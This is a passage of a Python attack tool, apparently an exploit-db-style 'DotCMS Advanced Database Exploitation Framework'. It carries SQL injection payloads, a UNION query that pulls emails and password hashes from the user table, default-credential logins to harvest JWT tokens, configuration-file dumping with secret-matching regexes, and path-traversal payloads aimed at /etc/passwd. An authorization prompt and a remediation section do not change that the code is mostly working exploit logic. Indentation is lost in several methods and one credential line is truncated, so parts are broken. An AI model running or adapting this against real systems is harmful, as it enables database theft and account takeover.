pass
if not vulnerable:
self.log("[+] CORS properly configured", 'success')
async def async_discovery(self):
    """Request a fixed list of paths concurrently and report the reachable ones.

    A path counts as discovered when its response status is 200, 301, 302 or
    403.  Request errors are recorded with status 0 and therefore excluded.

    Returns:
        A list of dictionaries with ``endpoint``, ``status`` and ``url`` keys.
    """
    self.log("[*] Starting asynchronous discovery...", 'info')

    # Common DotCMS endpoints
    paths = (
        '/api/v1/contenttype',
        '/api/v1/workflow',
        '/api/v1/sites',
        '/api/v1/users',
        '/api/v1/authentication',
        '/dotAdmin/',
        '/admin/',
        '/html/portlet/',
        '/c/',
        '/application/',
        '/.env',
        '/config.json',
        '/web.config',
        '/dotcms-config.xml',
    )
    reachable_statuses = [200, 301, 302, 403]

    async def probe(http, path):
        """Fetch one path; never raises, errors become a status-0 record."""
        address = urljoin(self.target, path)
        try:
            async with http.get(address, timeout=10, ssl=False) as reply:
                return {'endpoint': path, 'status': reply.status, 'url': str(reply.url)}
        except Exception as e:
            return {'endpoint': path, 'status': 0, 'error': str(e)}

    async with aiohttp.ClientSession(
        connector=aiohttp.TCPConnector(ssl=False),
        timeout=aiohttp.ClientTimeout(total=30),
    ) as http:
        outcomes = await asyncio.gather(*(probe(http, path) for path in paths))

    discovered = [
        outcome for outcome in outcomes
        if isinstance(outcome, dict) and outcome.get('status', 0) in reachable_statuses
    ]
    self.log(f"[+] Discovered {len(discovered)} accessible endpoints", 'success')
    return discovered
def enhanced_sqli_testing(self):
"""Enhanced SQL injection testing"""
self.log("\n[*] Starting enhanced SQL injection testing...", 'info')
endpoints = [
'/api/v1/contenttype',
'/api/v1/workflow',
'/api/v1/sites',
'/dotAdmin/personalization'
]
# Advanced payloads
payloads = {
'Time-Based': [
"' AND (SELECT pg_sleep(5))--",
"' AND SLEEP(5)--",
"' WAITFOR DELAY '00:00:05'--",
"' AND 1234=(SELECT 1234 FROM PG_SLEEP(5))--"
],
'Error-Based': [
"' AND (SELECT cast((SELECT 'test') as int))--",
"' AND extractvalue(1, concat(0x7e, version()))--",
"' AND 1=CONVERT(int, @@version)--"
],
'Boolean-Based': [
"' AND '1'='1",
"' AND '1'='2",
"' OR '1'='1"
],
'Union-Based': [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,2,3--",
"' UNION SELECT @@version,user(),database()--"
]
}
vulnerabilities = []
for endpoint in endpoints:
self.log(f"[*] Testing endpoint: {endpoint}", 'info')
url = urljoin(self.target, endpoint)
# First get baseline
try:
baseline = self.session.get(url, timeout=10)
baseline_length = len(baseline.text)
except:
baseline_length = 0
for category, category_payloads in payloads.items():
for payload in category_payloads[:3]: # Test first 3 of each category
try:
start_time = time.time()
response = self.session.get(
url,
params={'filter': payload},
timeout=15
)
elapsed = time.time() - start_time
# Time-Based detection
if category == 'Time-Based' and elapsed > 4:
self.log(f"[!] Time-Based SQLi detected on {endpoint}", 'critical')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'delay': round(elapsed, 2),
'status': response.status_code
})
evidence_id = self.evidence.add_evidence(
f'SQL_Injection_{category}',
endpoint,
payload,
f"GET {url}?filter={quote(payload)}",
response.text[:1000],
severity="Critical",
cvss=9.0,
cwe=89
)
self.stats['vulnerabilities'] += 1
break
# Error-Based detection
error_indicators = [
'SQL syntax', 'mysql_fetch', 'pg_', 'ORA-',
'Microsoft OLE DB', 'Unclosed quotation',
'You have an error in your SQL syntax'
]
if any(indicator.lower() in response.text.lower() for indicator in error_indicators):
self.log(f"[!] Error-Based SQLi detected on {endpoint}", 'critical')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'status': response.status_code
})
evidence_id = self.evidence.add_evidence(
f'SQL_Injection_{category}',
endpoint,
payload,
f"GET {url}?filter={quote(payload)}",
response.text[:1000],
severity="Critical",
cvss=9.0,
cwe=89
)
self.stats['vulnerabilities'] += 1
break
# Boolean-Based detection
if category == 'Boolean-Based':
test_length = len(response.text)
if abs(baseline_length - test_length) > 200:
self.log(f"[!] Boolean-Based SQLi suspected on {endpoint}", 'warning')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'length_diff': abs(baseline_length - test_length)
})
except Exception as e:
continue
return vulnerabilities
def extract_users_comprehensive(self, vulnerable_endpoint=None):
    """Send two fixed ``filter`` payloads per endpoint and collect e-mail addresses.

    Args:
        vulnerable_endpoint: Path to probe. When falsy, two built-in REST
            paths are tried instead.

    Returns:
        A list of dicts with ``email``, ``source`` and ``method`` keys, at
        most five per endpoint. When the list is non-empty it is also
        passed to ``save_extracted_data`` and its length is stored in
        ``self.stats['users_extracted']``.
    """
    self.log("\n[*] Starting comprehensive user extraction...", 'info')

    # Fall back to the built-in endpoints when the caller did not name one.
    candidate_endpoints = (
        [vulnerable_endpoint]
        if vulnerable_endpoint
        else ['/api/v1/contenttype', '/api/v1/sites']
    )

    version_probe = "' AND (SELECT substring(version() from 1 for 1))='P'--"
    union_probe = "' UNION SELECT NULL,emailaddress,password_ FROM user_ LIMIT 5--"
    email_regex = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
    hash_regex = r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+'

    users = []
    for endpoint in candidate_endpoints:
        try:
            full_url = urljoin(self.target, endpoint)

            # The reply to the version probe is never inspected; the request
            # is still issued so the traffic matches the established flow.
            self.session.get(full_url, params={'filter': version_probe}, timeout=10)

            reply = self.session.get(full_url, params={'filter': union_probe}, timeout=10)
            found_emails = re.findall(email_regex, reply.text)
            found_hashes = re.findall(hash_regex, reply.text)

            # Only the first five addresses per endpoint are recorded.
            for address in found_emails[:5]:
                users.append({
                    'email': address,
                    'source': endpoint,
                    'method': 'direct_extraction'
                })
                self.log(f"[+] Found email: {address}", 'success')

            # Hashes are not stored in the result, but their presence alone
            # is enough to record evidence.
            if found_emails or found_hashes:
                self.evidence.add_evidence(
                    'User_Data_Exposure',
                    endpoint,
                    union_probe,
                    f"GET {full_url}?filter={quote(union_probe)}",
                    reply.text[:2000],
                    severity="High",
                    cvss=7.5,
                    cwe=200
                )
        except Exception as exc:
            self.log(f"[-] Extraction failed for {endpoint}: {str(exc)}", 'error')

    if users:
        self.log(f"[+] Extracted {len(users)} potential users", 'success')
        self.save_extracted_data('users', users)
        self.stats['users_extracted'] = len(users)
    return users
def enhanced_jwt_hunting(self):
"""Collect JWT-looking strings from the login and current-user endpoints.

Each entry of a hard-coded credential list is POSTed as JSON to the login
URL. On an HTTP 200 reply the body is scanned for three dot-separated
base64url-style segments; matches longer than 50 characters are kept and
passed to ``validate_jwt``. The current-user endpoint is then fetched once
and every regex match in its body is added without the length filter.

Returns the list of collected token strings. When it is non-empty,
duplicates are removed and the list is handed to ``save_extracted_data``
and counted in ``self.stats['tokens_found']``.
NOTE(review): indentation is lost in this copy of the file, so the exact
extent of the final ``if found_tokens:`` body should be confirmed.
"""
self.log("\n[*] Enhanced JWT token hunting...", 'info')
found_tokens = []
# Check login endpoint
login_url = urljoin(self.target, '/api/v1/authentication/logInUser')
# Try default credentials
default_creds = [
# NOTE(review): the next line is truncated in this copy of the file (an
# unterminated string literal). The original first entry must be restored
# before this method can parse; its content cannot be inferred from here.
{'userId': '
{'userId': 'admin', 'password': 'admin123'},
{'userId': 'demo', 'password': 'demo'}
]
for creds in default_creds:
try:
response = self.session.post(
login_url,
json=creds,
timeout=10
)
if response.status_code == 200:
# Look for JWT in response
jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+'
tokens = re.findall(jwt_pattern, response.text)
for token in tokens:
# The pattern also matches short dotted strings, so only
# candidates longer than 50 characters are kept.
if len(token) > 50: # Basic JWT validation
found_tokens.append(token)
self.log(f"[+] Found JWT token: {token[:30]}...", 'success')
# Test token
if self.validate_jwt(token):
self.log(f"[?] JWT token is valid!", 'success')
except Exception as e:
# Any failure for one credential pair is ignored and the next pair is tried.
continue
# Also check current user endpoint
current_user_url = urljoin(self.target, '/api/v1/users/current')
try:
response = self.session.get(current_user_url, timeout=10)
jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+'
tokens = re.findall(jwt_pattern, response.text)
# Unlike the login path, no length filter is applied to these matches.
found_tokens.extend(tokens)
except:
# NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
pass
if found_tokens:
found_tokens = list(set(found_tokens)) # Remove duplicates
self.save_extracted_data('jwt_tokens', found_tokens)
self.stats['tokens_found'] = len(found_tokens)
return found_tokens
def validate_jwt(self, token):
    """Check a candidate JWT by shape and by presenting it as a bearer token.

    Args:
        token: Candidate token string.

    Returns:
        ``False`` when the token does not consist of exactly three
        dot-separated parts. Otherwise ``True`` as soon as one of the test
        URLs answers HTTP 200 with the token in the ``Authorization``
        header, and ``False`` if none does.

    NOTE(review): a 200 reply does not by itself prove the token was
    accepted if a test URL is reachable without authentication or the
    session already carries cookies; confirm against the target.
    """
    # Basic format check: header.payload.signature
    if len(token.split('.')) != 3:
        return False

    auth_headers = {'Authorization': f'Bearer {token}'}
    test_paths = (
        '/api/v1/users/current',
        '/api/v1/sites',
        '/dotAdmin/',
    )
    for path in test_paths:
        url = urljoin(self.target, path)
        try:
            response = self.session.get(url, headers=auth_headers, timeout=10)
            if response.status_code == 200:
                return True
        except Exception:
            # Best-effort probe: a failing request just moves on to the next
            # URL. Catching Exception (not a bare except) lets Ctrl-C and
            # SystemExit propagate to the caller.
            continue
    return False
def save_extracted_data(self, data_type, data):
    """Serialise ``data`` as indented JSON into ``<results_dir>/<data_type>.json``.

    Values that are not JSON-serialisable are written via ``str()``.
    A success message naming the file is logged afterwards.
    """
    destination = f"{self.results_dir}/{data_type}.json"
    with open(destination, 'w', encoding='utf-8') as out_file:
        json.dump(data, out_file, indent=2, default=str)
    self.log(f"[+] Data saved to {destination}", 'success')
def dump_configuration(self):
    """Request a fixed list of configuration paths and save any that are served.

    A path counts as found when the reply is HTTP 200 with more than ten
    characters of text. The body is written to
    ``<results_dir>/config_<name>.txt``, ``self.stats['files_leaked']`` is
    incremented, and the body is scanned with a few credential-style
    regexes whose first three matches are logged.

    Returns:
        A list of dicts with ``file``, ``url``, ``size`` and ``saved_as``.
    """
    self.log("\n[*] Dumping configuration files...", 'info')

    candidate_paths = (
        '/.env',
        '/config.json',
        '/configuration.json',
        '/web.config',
        '/server-config.xml',
        '/dotcms-config.xml',
        '/WEB-INF/web.xml',
        '/META-INF/context.xml',
    )
    sensitive_patterns = (
        r'password\s*[:=]\s*[\'"]?([^\'"\s]+)',
        r'secret\s*[:=]\s*[\'"]?([^\'"\s]+)',
        r'api[_-]?key\s*[:=]\s*[\'"]?([^\'"\s]+)',
        r'database.*password',
        r'jwt.*secret',
    )
    # Turns '/' and '.' into '_' so the remote path is usable as a file name.
    flatten = str.maketrans('/.', '__')

    leaked_files = []
    for config_file in candidate_paths:
        url = urljoin(self.target, config_file)
        try:
            reply = self.session.get(url, timeout=10)
            if reply.status_code != 200:
                continue
            body = reply.text
            if len(body) <= 10:
                continue

            self.log(f"[+] Found config file: {config_file}", 'success')

            # Save file
            safe_name = config_file.translate(flatten)
            file_path = f"{self.results_dir}/config_{safe_name}.txt"
            with open(file_path, 'w', encoding='utf-8') as out_file:
                out_file.write(body)

            leaked_files.append({
                'file': config_file,
                'url': url,
                'size': len(body),
                'saved_as': file_path
            })
            self.stats['files_leaked'] += 1

            # Check for sensitive info
            for pattern in sensitive_patterns:
                hits = re.findall(pattern, body, re.IGNORECASE)
                if hits:
                    self.log(f"[!] Sensitive data found in {config_file}: {hits[:3]}", 'critical')
        except Exception:
            # Any failure for one path is ignored; the scan moves on.
            continue
    return leaked_files
def check_file_inclusion(self):
    """Send path-traversal style values to a fixed set of download endpoints.

    Each payload is sent as both the ``file`` and ``filename`` query
    parameters. A reply containing any of the marker strings is recorded as
    a finding and as evidence, after which the remaining payloads for that
    endpoint are skipped.

    Returns:
        A list of dicts with ``endpoint``, ``payload`` and
        ``response_sample`` (first 200 characters of the reply).
    """
    self.log("\n[*] Checking for file inclusion vulnerabilities...", 'info')

    lfi_payloads = (
        '../../../../etc/passwd',
        '../../../../windows/win.ini',
        '../../../../WEB-INF/web.xml',
        '../../../../proc/self/environ',
        'file:///etc/passwd',
        '....//....//....//etc/passwd',
    )
    candidate_endpoints = (
        '/api/v1/download',
        '/dotAdmin/download',
        '/html/portlet/ext/contentlet/field_validation.jsp',
        '/c/download',
    )
    # Substrings checked for in the reply body.
    markers = ('root:', '[fonts]', '<web-app', 'PATH=', 'JAVA_OPTS')

    found_lfi = []
    for endpoint in candidate_endpoints:
        url = urljoin(self.target, endpoint)
        for payload in lfi_payloads:
            query = {'file': payload, 'filename': payload}
            try:
                reply = self.session.get(url, params=query, timeout=10)
                body = reply.text
                if not any(marker in body for marker in markers):
                    continue

                self.log(f"[!] LFI vulnerability found: {endpoint}?file={payload}", 'critical')
                found_lfi.append({
                    'endpoint': endpoint,
                    'payload': payload,
                    'response_sample': body[:200]
                })
                self.evidence.add_evidence(
                    'Local_File_Inclusion',
                    endpoint,
                    payload,
                    f"GET {url}?file={quote(payload)}",
                    body[:1000],
                    severity="High",
                    cvss=7.5,
                    cwe=22
                )
                # One confirmed payload per endpoint is enough.
                break
            except Exception:
                continue
    return found_lfi
def run_database_exploitation(self, vulnerable_endpoint=None):
    """Run the database module against an endpoint and update the counters.

    Args:
        vulnerable_endpoint: Endpoint to use. When falsy,
            ``enhanced_sqli_testing`` is run and its first finding is used.

    Returns:
        Whatever ``self.db_enumerator.comprehensive_database_dump`` returns,
        or ``None`` when no endpoint was given and none could be found.
    """
    separator = "=" * 80
    self.log("\n" + separator, 'info')
    self.log("DATABASE EXPLOITATION MODULE", 'section')
    self.log(separator, 'info')

    # If no endpoint provided, find one
    if not vulnerable_endpoint:
        findings = self.enhanced_sqli_testing()
        if not findings:
            self.log("[-] No SQL injection vulnerabilities found", 'error')
            return None
        vulnerable_endpoint = findings[0].get('endpoint')
        self.log(f"[+] Using vulnerable endpoint: {vulnerable_endpoint}", 'success')

    # Run comprehensive database dump
    db_results = self.db_enumerator.comprehensive_database_dump(vulnerable_endpoint)

    # Update statistics
    if db_results:
        table_list = db_results.get('tables', [])
        dumped = db_results.get('dumped_data', {})
        self.stats['tables_enumerated'] = len(table_list)
        self.stats['records_dumped'] = sum(len(rows) for rows in dumped.values())
    return db_results
def run_full_exploitation(self):
    """Run every phase in order and finish with the report and statistics.

    Phases: reconnaissance (TLS, CORS, async discovery), SQLi assessment,
    database module (only when SQLi was found), user and token collection,
    configuration and file-inclusion checks, then reporting.
    """
    self.log(f"\n{Fore.CYAN}{'='*80}", 'info')
    self.log(f"{Fore.YELLOW}STARTING COMPLETE EXPLOITATION CHAIN", 'info')
    self.log(f"{Fore.CYAN}{'='*80}{Style.RESET_ALL}", 'info')

    # Phase 1: Reconnaissance
    self.log("\n[PHASE 1] RECONNAISSANCE", 'section')
    self.check_tls()
    self.cors_analysis()

    # Async discovery is best-effort: a failure is logged and the chain
    # continues. Exception (not a bare except) keeps Ctrl-C working, and the
    # finally clause closes the loop even when discovery raises.
    loop = None
    try:
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        loop.run_until_complete(self.async_discovery())
    except Exception:
        self.log("[-] Async discovery failed, continuing...", 'warning')
    finally:
        if loop is not None:
            loop.close()

    # Phase 2: Vulnerability Assessment
    self.log("\n[PHASE 2] VULNERABILITY ASSESSMENT", 'section')
    # Normalise a falsy result to a list so later len()/indexing is safe.
    sqli_vulns = self.enhanced_sqli_testing() or []
    first_endpoint = sqli_vulns[0].get('endpoint') if sqli_vulns else None

    # Phase 3: Database Exploitation
    self.log("\n[PHASE 3] DATABASE EXPLOITATION", 'section')
    db_results = None
    if sqli_vulns:
        db_results = self.run_database_exploitation(first_endpoint)
    else:
        self.log("[-] Skipping database exploitation - no SQLi found", 'warning')

    # Phase 4: Application Exploitation
    self.log("\n[PHASE 4] APPLICATION EXPLOITATION", 'section')
    if sqli_vulns:
        users = self.extract_users_comprehensive(first_endpoint)
    else:
        # No confirmed endpoint: the callee falls back to its defaults.
        users = self.extract_users_comprehensive()
    tokens = self.enhanced_jwt_hunting()

    # Phase 5: Post-Exploitation
    self.log("\n[PHASE 5] POST-EXPLOITATION", 'section')
    leaked_configs = self.dump_configuration()
    lfi_vulns = self.check_file_inclusion()

    # Phase 6: Reporting
    self.log("\n[PHASE 6] REPORTING", 'section')
    self.generate_comprehensive_report(
        sqli_vulns, users, tokens, leaked_configs, lfi_vulns, db_results
    )

    # Show statistics
    self.show_statistics()
def generate_comprehensive_report(self, sqli_vulns, users, tokens, configs, lfi_vulns, db_results=None):
    """Write the text report to ``<results_dir>/penetration_test_report.txt``.

    Args:
        sqli_vulns: List of SQLi finding dicts (``endpoint``, ``type``,
            ``payload``, optional ``delay``).
        users: List of dicts with an ``email`` key.
        tokens: List of token strings; only the first 30 characters of the
            first three are written.
        configs: List of dicts with a ``file`` key.
        lfi_vulns: List of dicts with ``endpoint`` and ``payload`` keys.
        db_results: Optional dict from the database module.

    Any of the list arguments may be ``None``; it is treated as empty so a
    report is still produced. The first 2000 characters of the report are
    also printed to stdout.
    """
    # Treat None as "nothing found" instead of crashing in len().
    sqli_vulns = sqli_vulns or []
    users = users or []
    tokens = tokens or []
    configs = configs or []
    lfi_vulns = lfi_vulns or []

    heavy_rule = '=' * 80
    light_rule = '-' * 80

    def section(*lines):
        # Each section starts and ends with a newline, one line per entry.
        return "\n" + "\n".join(lines) + "\n"

    overall_risk = "CRITICAL" if len(sqli_vulns) > 0 else "HIGH"

    # Collected pieces are joined once at the end instead of repeated +=.
    parts = [section(
        heavy_rule,
        "PENETRATION TEST REPORT - DotCMS Assessment",
        heavy_rule,
        f"Target: {self.target}",
        f"Date: {datetime.now()}",
        "Tool: DotCMS Advanced Exploitation Framework",
        "EXECUTIVE SUMMARY",
        light_rule,
        f"Critical Vulnerabilities: {len(sqli_vulns)}",
        f"Database Tables Enumerated: {self.stats['tables_enumerated']}",
        f"Database Records Dumped: {self.stats['records_dumped']}",
        f"Sensitive Data Exposed: {len(users) + len(tokens)}",
        f"Configuration Files Leaked: {len(configs)}",
        f"LFI Vulnerabilities: {len(lfi_vulns)}",
        f"Overall Risk: {overall_risk}",
    )]

    # Database specific findings
    if db_results:
        parts.append(section(
            "DATABASE FINDINGS",
            light_rule,
            f"Database Type: {db_results.get('database_info', {}).get('type', 'Unknown')}",
            f"Tables Discovered: {len(db_results.get('tables', []))}",
            f"Tables Dumped: {len(db_results.get('dumped_data', {}))}",
            f"Sensitive Columns: {len(db_results.get('sensitive_columns', {}))}",
            f"Cleartext Passwords/Data: {len(db_results.get('cleartext_data', {}))}",
        ))

    parts.append(section(
        "DETAILED FINDINGS",
        light_rule,
        f"1. SQL INJECTION VULNERABILITIES: {len(sqli_vulns)}",
    ))
    for i, vuln in enumerate(sqli_vulns, 1):
        parts.append(f" {i}. Endpoint: {vuln.get('endpoint', 'N/A')}\n")
        parts.append(f" Type: {vuln.get('type', 'N/A')}\n")
        if 'delay' in vuln:
            parts.append(f" Delay: {vuln['delay']} seconds\n")
        parts.append(f" Payload: {vuln.get('payload', 'N/A')[:50]}...\n")

    # Database findings (section 2 is omitted when no tables were listed)
    if db_results and db_results.get('tables'):
        parts.append(section("2. DATABASE ENUMERATION RESULTS"))
        for i, table in enumerate(db_results.get('tables', [])[:10], 1):
            parts.append(f" {i}. Table: {table}\n")
        if db_results.get('dumped_data'):
            parts.append(f"\n Data dumped from {len(db_results['dumped_data'])} tables\n")
        if db_results.get('cleartext_data'):
            parts.append(f" Cleartext data found in {len(db_results['cleartext_data'])} columns\n")

    parts.append(section(f"3. USER DATA EXPOSED: {len(users)}"))
    for i, user in enumerate(users[:5], 1):
        parts.append(f" {i}. Email: {user.get('email', 'N/A')}\n")

    parts.append(section(f"4. JWT TOKENS FOUND: {len(tokens)}"))
    for i, token in enumerate(tokens[:3], 1):
        parts.append(f" {i}. Token: {token[:30]}...\n")

    parts.append(section(f"5. CONFIGURATION FILES: {len(configs)}"))
    for i, config in enumerate(configs[:3], 1):
        parts.append(f" {i}. File: {config.get('file', 'N/A')}\n")

    parts.append(section(f"6. LFI VULNERABILITIES: {len(lfi_vulns)}"))
    for i, lfi in enumerate(lfi_vulns, 1):
        parts.append(f" {i}. Endpoint: {lfi.get('endpoint', 'N/A')}\n")
        parts.append(f" Payload: {lfi.get('payload', 'N/A')}\n")

    parts.append(section(
        "RECOMMENDATIONS",
        light_rule,
        "1. IMMEDIATE: Patch all SQL injection vulnerabilities",
        "2. Encrypt all database fields containing sensitive data",
        "3. Implement proper input validation and parameterized queries",
        "4. Rotate all exposed credentials and JWT tokens",
        "5. Implement database activity monitoring",
        "6. Restrict access to configuration files",
        "7. Conduct comprehensive security audit",
        "8. Implement Web Application Firewall (WAF)",
        "EVIDENCE LOCATION",
        light_rule,
        f"Evidence Database: {self.evidence.evidence_db}",
        f"Results Directory: {self.results_dir}",
        f"Database Dumps: {self.results_dir}/dump_*.json",
        f"Full Database Report: {self.results_dir}/database_penetration_report.txt",
        f"Log File: {self.results_dir}/execution.log",
        heavy_rule,
        "END OF REPORT",
        heavy_rule,
    ))

    report = "".join(parts)
    report_file = f"{self.results_dir}/penetration_test_report.txt"
    with open(report_file, 'w', encoding='utf-8') as f:
        f.write(report)
    self.log(f"[+] Report generated: {report_file}", 'success')
    print(f"\n{Fore.GREEN}{report[:2000]}...{Style.RESET_ALL}")
def show_statistics(self):
    """Print the run counters from ``self.stats`` and the output locations."""
    heavy_rule = '=' * 80
    light_rule = '-' * 80
    lines = [
        heavy_rule,
        "EXPLOITATION STATISTICS",
        heavy_rule,
        f"Vulnerabilities Found: {self.stats['vulnerabilities']}",
        f"Database Tables Enumerated: {self.stats['tables_enumerated']}",
        f"Database Records Dumped: {self.stats['records_dumped']}",
        f"Users Extracted: {self.stats['users_extracted']}",
        f"JWT Tokens Found: {self.stats['tokens_found']}",
        f"Files Leaked: {self.stats['files_leaked']}",
        "DIRECTORIES CREATED",
        light_rule,
        f"Evidence Directory: {self.evidence.evidence_dir}",
        f"Results Directory: {self.results_dir}",
        # The braces are doubled so "{json,csv}" is printed literally; a
        # single pair would be evaluated as the tuple expression (json, csv).
        f"Database Dumps: {self.results_dir}/dump_*.{{json,csv}}",
        "NEXT STEPS",
        light_rule,
        f"1. Review database dumps in: {self.results_dir}/dump_*.json",
        f"2. Check cleartext data in: {self.results_dir}/cleartext_search.json",
        f"3. See database report: {self.results_dir}/database_penetration_report.txt",
        "4. Present critical findings to security team immediately",
        heavy_rule,
    ]
    stats_text = "\n" + "\n".join(lines) + "\n"
    print(f"{Fore.CYAN}{stats_text}{Style.RESET_ALL}")
def main():
    """Parse the command line, confirm authorization, and run the chosen mode.

    The run is aborted with exit status 1 unless the operator answers
    ``yes`` to the authorization prompt (surrounding whitespace is ignored;
    end-of-input counts as a refusal). Without a mode flag an interactive
    menu is shown; an unrecognised menu answer runs the full chain.
    """
    banner = r"""
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???
Advanced Database Exploitation Framework
Authorized testing only!
"""
    parser = argparse.ArgumentParser(
        description='DotCMS Advanced Database Exploitation Framework',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog='''
Examples:
%(prog)s -t https://target.com:8443 --database
%(prog)s --target http://localhost:8080 --full
Modes:
--database : Perform database enumeration and dump only
--full : Complete exploitation including database
--quick : Quick scan without heavy operations
Legal Notice:
This tool is for authorized penetration testing only.
Unauthorized use is illegal and unethical.
'''
    )
    parser.add_argument('-t', '--target', required=True,
                        help='Target URL (e.g., https://target.com:8443)')
    parser.add_argument('--database', action='store_true',
                        help='Database enumeration and dump only')
    parser.add_argument('--full', action='store_true',
                        help='Complete exploitation (including database)')
    parser.add_argument('--quick', action='store_true',
                        help='Quick scan only')
    args = parser.parse_args()
    print(f"{Fore.RED}{banner}{Style.RESET_ALL}")

    # Confirm authorization. A closed stdin is treated as "no" rather than
    # crashing with a traceback before the refusal message is shown.
    try:
        answer = input(f"{Fore.YELLOW}[?] Do you have explicit permission to test {args.target}? (yes/NO): {Style.RESET_ALL}")
    except EOFError:
        answer = ''
    if answer.strip().lower() != 'yes':
        print(f"{Fore.RED}[!] Operation cancelled. Unauthorized access is illegal.{Style.RESET_ALL}")
        sys.exit(1)

    # Run exploitation
    try:
        exploit = DotCMSExploiter(args.target)
        if args.database:
            exploit.log("[*] Running database exploitation only...", 'info')
            _run_database_only(exploit, "[-] No SQL injection found for database exploitation")
        elif args.full:
            exploit.run_full_exploitation()
        elif args.quick:
            exploit.log("[*] Running quick scan...", 'info')
            _run_quick_scan(exploit)
        else:
            # Interactive mode
            print(f"\n{Fore.CYAN}Select operation mode:{Style.RESET_ALL}")
            print("1. Full exploitation (including database)")
            print("2. Database enumeration only")
            print("3. Quick vulnerability scan")
            # Stripped so that e.g. "2 " selects option 2 instead of silently
            # falling through to the full chain.
            choice = input(f"\n{Fore.YELLOW}Select option (1-3): {Style.RESET_ALL}").strip()
            if choice == '1':
                exploit.run_full_exploitation()
            elif choice == '2':
                _run_database_only(exploit, "[-] No SQL injection found")
            elif choice == '3':
                _run_quick_scan(exploit)
            else:
                exploit.log("[*] Running full exploitation by default", 'info')
                exploit.run_full_exploitation()
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
    except Exception as e:
        print(f"{Fore.RED}[!] Critical error: {str(e)}{Style.RESET_ALL}")
        import traceback
        traceback.print_exc()


def _run_database_only(exploit, not_found_message):
    """Run SQLi testing and, on a finding, the database module for its endpoint."""
    sqli_vulns = exploit.enhanced_sqli_testing()
    if sqli_vulns:
        exploit.run_database_exploitation(sqli_vulns[0].get('endpoint'))
    else:
        exploit.log(not_found_message, 'error')


def _run_quick_scan(exploit):
    """Run the TLS check and SQLi testing, then write a report of what was found."""
    exploit.check_tls()
    sqli_vulns = exploit.enhanced_sqli_testing() or []
    users = []
    if sqli_vulns:
        # Keep the result so the report's user section reflects it instead
        # of always being written as empty.
        users = exploit.extract_users_comprehensive(sqli_vulns[0].get('endpoint')) or []
    exploit.generate_comprehensive_report(sqli_vulns, users, [], [], [])
if __name__ == '__main__':
    # On Windows, switch asyncio to the selector event loop policy before
    # any event loop is created by the async discovery phase.
    running_on_windows = sys.platform == 'win32'
    if running_on_windows:
        selector_policy = asyncio.WindowsSelectorEventLoopPolicy()
        asyncio.set_event_loop_policy(selector_policy)
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================